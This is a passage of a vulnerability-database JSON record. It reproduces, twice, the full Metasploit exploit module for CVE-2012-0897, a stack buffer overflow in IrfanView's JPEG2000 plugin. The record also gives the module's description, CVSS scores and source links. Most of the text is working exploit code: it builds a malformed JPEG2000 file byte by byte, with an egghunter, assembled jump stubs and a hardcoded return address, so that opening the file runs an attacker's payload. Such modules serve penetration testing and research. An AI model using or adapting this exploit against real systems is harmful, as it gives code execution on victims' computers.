encoded_bytes\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tjp2 = \"\"\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0c\" #\r\n\t\tjp2 << \"\\x6a\\x50\\x20\\x20\" # [jP ] <0x6a502020> magic 0xd0a870a,len 12\r\n\t\tjp2 << \"\\x0d\\x0a\\x87\\x0a\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x14\" #\r\n\t\tjp2 << \"\\x66\\x74\\x79\\x70\" #\r\n\t\tjp2 << \"\\x6a\\x70\\x32\\x20\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # MinorVersion = 0 = [\\0\\0\\0\\0]\r\n\t\tjp2 << \"\\x6a\\x70\\x32\\x20\" # Compat = 0x6a703220 = [jp2 ]\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x38\" #\r\n\t\tjp2 << \"\\x75\\x75\\x69\\x64\" # [uuid] <0x75756964> len 56 data offset 8\r\n\t\tjp2 << \"\\x61\\x70\\x00\\xde\\xec\\x87\" # 56 bytes with start and end tags\r\n\t\tjp2 << \"\\xd5\\x11\\xb2\\xed\\x00\\x50\" #\r\n\t\tjp2 << \"\\x04\\x71\\xfd\\xdc\\xd2\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x40\\x01\\x00\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x60\\x09\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x30\\x00\\x00\\x00\" #\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x2d\" #\r\n\t\tjp2 << \"\\x6a\\x70\\x32\\x68\" # [jp2h] <0x6a703268> len 45 data offset 8\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x16\" #\r\n\t\tjp2 << \"\\x69\\x68\\x64\\x72\" # [ihdr] <0x69686472> len 22 data offset 8\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # ImageHeight = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # ImageWidth = 10\r\n\t\tjp2 << \"\\x00\\x03\" # NumberOfComponents = 3\r\n\t\tjp2 << \"\\x07\" # BitsPerComponent = 7\r\n\t\tjp2 << \"\\x07\" # Compression = 7\r\n\t\tjp2 << \"\\x01\" # Colorspace = 0x1 = unknown\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x0f\" #\r\n\t\tjp2 << \"\\x63\\x6f\\x6c\\x72\" # [colr] <0x636f6c72> len 15 data offset 8\r\n\t\tjp2 << \"\\x01\" # Method = 1\r\n\t\tjp2 << \"\\x00\" # Precedence = 0\r\n\t\tjp2 << \"\\x00\" # ColorSpaceAproximation = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\" # EnumeratedColorSpace = 16 = sRGB\r\n\t\tjp2 << \"\\x10\\x00\\x00\\x00\\x00\" #\r\n\t\tjp2 << \"\\x6a\\x70\\x32\\x63\" # [jp2c] <0x6a703263> length 0 data offset 8\r\n\t\tjp2 << \"\\xff\\x4f\" # <0xff4f=JP2C_SOC> Start of codestream\r\n\t\tjp2 << \"\\xff\\x51\" # <0xff51=JP2C_SIZ> length 47\r\n\t\tjp2 << \"\\x00\\x2f\" # 47 bytes\r\n\t\tjp2 << \"\\x00\\x00\" # Capabilities = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # GridWidth = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # GridHeight = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # XImageOffset = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # YImageOffset = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # TileWidth = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x0a\" # TileHeight = 10\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # Xtileoffset = 0\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\" # Ytileoffset = 0\r\n\t\tjp2 << \"\\x00\\x03\" # NumberOfComponents = 3\r\n\t\tjp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\r\n\t\tjp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\r\n\t\tjp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\r\n\t\tjp2 << \"\\xff\\x52\" # <0xff52=JP2C_COD> length 12\r\n\t\tjp2 << \"\\x00\\x0c\" # 12 bytes\r\n\t\tjp2 << \"\\x00\" # codingStyle=0=entropy coder w/o partition\r\n\t\tjp2 << \"\\x00\" # ProgressionOrder = 0\r\n\t\tjp2 << \"\\x00\\x05\" # NumberOfLayers = 0x5\r\n\t\tjp2 << \"\\x01\" # MultiComponentTransform=0x1=5/3 reversible\r\n\t\tjp2 << \"\\x05\" # DecompLevels = 5\r\n\t\tjp2 << \"\\x04\" # CodeBlockWidthExponent=0x4+2 # cbw ->64\r\n\t\tjp2 << \"\\x04\" # CodeBlockHeightExponent=0x4+2 # cbh ->64\r\n\t\tjp2 << \"\\x00\" # CodeBLockStyle = 0\r\n\t\tjp2 << \"\\x00\" # QMIFBankId = 0\r\n\r\n\t\teggoptions =\r\n\t\t{\r\n\t\t\t:checksum => false,\r\n\t\t\t:eggtag => 'pwnd'\r\n\t\t}\r\n\r\n\t\thunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\r\n\t\tqcd_data = \"\"\r\n\t\tqcd_data << make_nops(10)\r\n\t\tqcd_data << encode_bytes(hunter)\r\n\t\tqcd_data << rand_text_alpha(146)\r\n\r\n\t\tjmp_hunter = %q{\r\n\t\t\tjmp $-0xad\r\n\t\t\tinc ecx\r\n\t\t}\r\n\r\n\t\t# jump to our egghunter\r\n\t\tjmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string\r\n\r\n\t\tqcd_data << encode_bytes(jmp_hunter)\r\n\t\tqcd_data << rand_text_alpha(196-qcd_data.length)\r\n\t\tqcd_data << encode_bytes([target.ret].pack(\"V\"))\r\n\r\n\t\t# align ecx and jmp\r\n\t\tpivot = %q{\r\n\t\t\tinc ch\r\n\t\t\tjmp ecx\r\n\t\t}\r\n\r\n\t\tpivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string\r\n\r\n\t\tqcd_data << encode_bytes(pivot)\r\n\t\tqcd_data << egg\r\n\r\n\t\tjp2 << \"\\xff\\x5c\" # start\r\n\t\tjp2 << \"\\x00\\xf5\" # arbitrary size to trigger overflow\r\n\t\tjp2 << \"\\x22\" # guard\r\n\t\tjp2 << qcd_data # malicious code\r\n\t\tjp2 << \"\\xff\\x90\" # <0xff90=JP2C_SOT>len 10\r\n\t\tjp2 << \"\\x00\\x0a\" # 10 bytes\r\n\t\tjp2 << \"\\x00\\x00\\x00\\x00\\x00\\x68\\x00\\x01\"\r\n\t\tjp2 << \"\\xff\\x93\" # <0xff93=JP2C_SOD> Start of data\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\r\n\t\tjp2 << \"\\x80\\x80\"\r\n\t\tjp2 << \"\\xff\\xd9\"\r\n\r\n\t\t# Create the file\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(jp2)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19519/"}], "metasploit": [{"lastseen": "2020-10-13T00:43:38", "description": "This module exploits a stack-based buffer overflow vulnerability in version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been tested on a specific version of irfanview (v4.3.2), although other versions may work also. The vulnerability is triggered via parsing an invalid qcd chunk structure and specifying a malformed qcd size and data. Payload delivery and vulnerability trigger can be executed in multiple ways. The user can double click the file, use the file dialog, open via the icon and drag/drop the file into Irfanview's window. An egg hunter is used for stability.\n", "published": "2012-06-29T18:13:02", "type": "metasploit", "title": "Irfanview JPEG2000 jp2 Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0897"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/IRFANVIEW_JPEG2000_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Egghunter\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Irfanview JPEG2000 jp2 Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability in\n version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has\n been tested on a specific version of irfanview (v4.3.2), although other\n versions may work also. The vulnerability is triggered via parsing an\n invalid qcd chunk structure and specifying a malformed qcd size and\n data.\n\n Payload delivery and vulnerability trigger can be executed in multiple\n ways. The user can double click the file, use the file dialog, open via\n the icon and drag/drop the file into Irfanview's window. An egg hunter\n is used for stability.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery\n 'mr_me <steventhomasseeley[at]gmail.com>', # msf-fu\n 'juan vazquez' # more improvements\n ],\n 'References' =>\n [\n [ 'CVE', '2012-0897' ],\n [ 'OSVDB', '78333'],\n [ 'BID', '51426' ],\n [ 'URL', 'http://www.greyhathacker.net/?p=525' ],\n ],\n 'Platform' => [ 'win' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 4000,\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n # push esp; retn [i_view32.exe]\n # http://www.oldapps.com/irfanview.php?old_irfanview=7097\n # http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe\n [ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]\n ],\n 'DisclosureDate' => '2012-01-16',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),\n ])\n end\n\n # encode our string like unicode except we are not using nulls\n def encode_bytes(raw_bytes)\n encoded_bytes = \"\"\n 0.step(raw_bytes.length-1, 2) { |i|\n encoded_bytes << raw_bytes[i+1]\n encoded_bytes << raw_bytes[i]\n }\n return encoded_bytes\n end\n\n def exploit\n jp2 = \"\"\n jp2 << \"\\x00\\x00\\x00\\x0c\" #\n jp2 << \"\\x6a\\x50\\x20\\x20\" # [jP ] <0x6a502020> magic 0xd0a870a,len 12\n jp2 << \"\\x0d\\x0a\\x87\\x0a\" #\n jp2 << \"\\x00\\x00\\x00\\x14\" #\n jp2 << \"\\x66\\x74\\x79\\x70\" #\n jp2 << \"\\x6a\\x70\\x32\\x20\" #\n jp2 << \"\\x00\\x00\\x00\\x00\" # MinorVersion = 0 = [\\0\\0\\0\\0]\n jp2 << \"\\x6a\\x70\\x32\\x20\" # Compat = 0x6a703220 = [jp2 ]\n jp2 << \"\\x00\\x00\\x00\\x38\" #\n jp2 << \"\\x75\\x75\\x69\\x64\" # [uuid] <0x75756964> len 56 data offset 8\n jp2 << \"\\x61\\x70\\x00\\xde\\xec\\x87\" # 56 bytes with start and end tags\n jp2 << \"\\xd5\\x11\\xb2\\xed\\x00\\x50\" #\n jp2 << \"\\x04\\x71\\xfd\\xdc\\xd2\\x00\" #\n jp2 << \"\\x00\\x00\\x40\\x01\\x00\\x00\" #\n jp2 << \"\\x00\\x00\\x00\\x00\\x60\\x09\" #\n jp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" #\n jp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" #\n jp2 << \"\\x00\\x00\\x30\\x00\\x00\\x00\" #\n jp2 << \"\\x00\\x00\\x00\\x2d\" #\n jp2 << \"\\x6a\\x70\\x32\\x68\" # [jp2h] <0x6a703268> len 45 data offset 8\n jp2 << \"\\x00\\x00\\x00\\x16\" #\n jp2 << \"\\x69\\x68\\x64\\x72\" # [ihdr] <0x69686472> len 22 data offset 8\n jp2 << \"\\x00\\x00\\x00\\x0a\" # ImageHeight = 10\n jp2 << \"\\x00\\x00\\x00\\x0a\" # ImageWidth = 10\n jp2 << \"\\x00\\x03\" # NumberOfComponents = 3\n jp2 << \"\\x07\" # BitsPerComponent = 7\n jp2 << \"\\x07\" # Compression = 7\n jp2 << \"\\x01\" # Colorspace = 0x1 = unknown\n jp2 << \"\\x00\\x00\\x00\\x00\\x0f\" #\n jp2 << \"\\x63\\x6f\\x6c\\x72\" # [colr] <0x636f6c72> len 15 data offset 8\n jp2 << \"\\x01\" # Method = 1\n jp2 << \"\\x00\" # Precedence = 0\n jp2 << \"\\x00\" # ColorSpaceAproximation = 0\n jp2 << \"\\x00\\x00\\x00\" # EnumeratedColorSpace = 16 = sRGB\n jp2 << \"\\x10\\x00\\x00\\x00\\x00\" #\n jp2 << \"\\x6a\\x70\\x32\\x63\" # [jp2c] <0x6a703263> length 0 data offset 8\n jp2 << \"\\xff\\x4f\" # <0xff4f=JP2C_SOC> Start of codestream\n jp2 << \"\\xff\\x51\" # <0xff51=JP2C_SIZ> length 47\n jp2 << \"\\x00\\x2f\" # 47 bytes\n jp2 << \"\\x00\\x00\" # Capabilities = 0\n jp2 << \"\\x00\\x00\\x00\\x0a\" # GridWidth = 10\n jp2 << \"\\x00\\x00\\x00\\x0a\" # GridHeight = 10\n jp2 << \"\\x00\\x00\\x00\\x00\" # XImageOffset = 0\n jp2 << \"\\x00\\x00\\x00\\x00\" # YImageOffset = 0\n jp2 << \"\\x00\\x00\\x00\\x0a\" # TileWidth = 10\n jp2 << \"\\x00\\x00\\x00\\x0a\" # TileHeight = 10\n jp2 << \"\\x00\\x00\\x00\\x00\" # Xtileoffset = 0\n jp2 << \"\\x00\\x00\\x00\\x00\" # Ytileoffset = 0\n jp2 << \"\\x00\\x03\" # NumberOfComponents = 3\n jp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\n jp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\n jp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1\n jp2 << \"\\xff\\x52\" # <0xff52=JP2C_COD> length 12\n jp2 << \"\\x00\\x0c\" # 12 bytes\n jp2 << \"\\x00\" # codingStyle=0=entropy coder w/o partition\n jp2 << \"\\x00\" # ProgressionOrder = 0\n jp2 << \"\\x00\\x05\" # NumberOfLayers = 0x5\n jp2 << \"\\x01\" # MultiComponentTransform=0x1=5/3 reversible\n jp2 << \"\\x05\" # DecompLevels = 5\n jp2 << \"\\x04\" # CodeBlockWidthExponent=0x4+2 # cbw ->64\n jp2 << \"\\x04\" # CodeBlockHeightExponent=0x4+2 # cbh ->64\n jp2 << \"\\x00\" # CodeBLockStyle = 0\n jp2 << \"\\x00\" # QMIFBankId = 0\n\n eggoptions =\n {\n :checksum => false,\n :eggtag => 'pwnd'\n }\n\n hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\n qcd_data = \"\"\n qcd_data << make_nops(10)\n qcd_data << encode_bytes(hunter)\n qcd_data << rand_text_alpha(146)\n\n jmp_hunter = %q{\n jmp $-0xad\n inc ecx\n }\n\n # jump to our egghunter\n jmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string\n\n qcd_data << encode_bytes(jmp_hunter)\n qcd_data << rand_text_alpha(196-qcd_data.length)\n qcd_data << encode_bytes([target.ret].pack(\"V\"))\n\n # align ecx and jmp\n pivot = %q{\n inc ch\n jmp ecx\n }\n\n pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string\n\n qcd_data << encode_bytes(pivot)\n qcd_data << egg\n\n jp2 << \"\\xff\\x5c\" # start\n jp2 << \"\\x00\\xf5\" # arbitrary size to trigger overflow\n jp2 << \"\\x22\" # guard\n jp2 << qcd_data # malicious code\n jp2 << \"\\xff\\x90\" # <0xff90=JP2C_SOT>len 10\n jp2 << \"\\x00\\x0a\" # 10 bytes\n jp2 << \"\\x00\\x00\\x00\\x00\\x00\\x68\\x00\\x01\"\n jp2 << \"\\xff\\x93\" # <0xff93=JP2C_SOD> Start of data\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\"\n jp2 << \"\\x80\\x80\"\n jp2 << \"\\xff\\xd9\"\n\n # Create the file\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(jp2)\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb"}]}